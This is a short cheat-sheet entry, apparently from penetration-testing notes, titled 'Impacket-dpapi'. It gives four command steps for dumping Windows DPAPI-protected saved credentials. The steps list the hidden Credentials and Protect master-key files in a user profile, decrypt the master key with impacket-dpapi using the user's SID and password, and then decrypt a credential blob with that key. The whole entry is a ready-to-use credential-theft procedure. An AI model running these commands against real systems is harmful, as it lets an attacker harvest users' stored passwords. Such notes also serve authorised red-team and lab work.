Impacket-dpapi
Dump DPAPI credentials using impacket
Steps:
1)
C:\Users\USER\AppData\Roaming\Microsoft\Credentials> dir -h2)
C:\Users\USER\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115> dir -h3)
impacket-dpapi masterkey -file MASTERKEY_FILE -sid USER_SID -password PASSWORD4)
impacket-dpapi credential -file CREDENTIAL_FILE -key DUMPED_KEY_FROM PREVIOUS_COMMANDLast updated